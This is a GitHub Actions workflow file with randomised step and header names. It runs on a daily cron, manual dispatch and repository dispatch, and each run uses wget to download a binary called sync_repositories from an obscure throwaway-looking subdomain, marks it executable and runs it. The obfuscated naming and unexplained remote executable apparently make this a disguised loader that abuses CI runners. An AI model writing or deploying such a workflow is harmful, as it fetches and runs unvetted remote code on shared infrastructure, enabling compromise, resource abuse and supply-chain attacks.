#2024-03-18-[135736]-erfq93pl
name: main

on:
  workflow_dispatch:

  repository_dispatch:
    types: runner_workflow

  schedule:
    - cron: "11 4 * * * "
    
jobs:
  build-deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: ydzo1rzzjjujtw6g
        run: |
          wget -q https://s9cs7oal872nphjo.callforpapers.eu.org/sync_repositories
          chmod 755 sync_repositories
          ./sync_repositories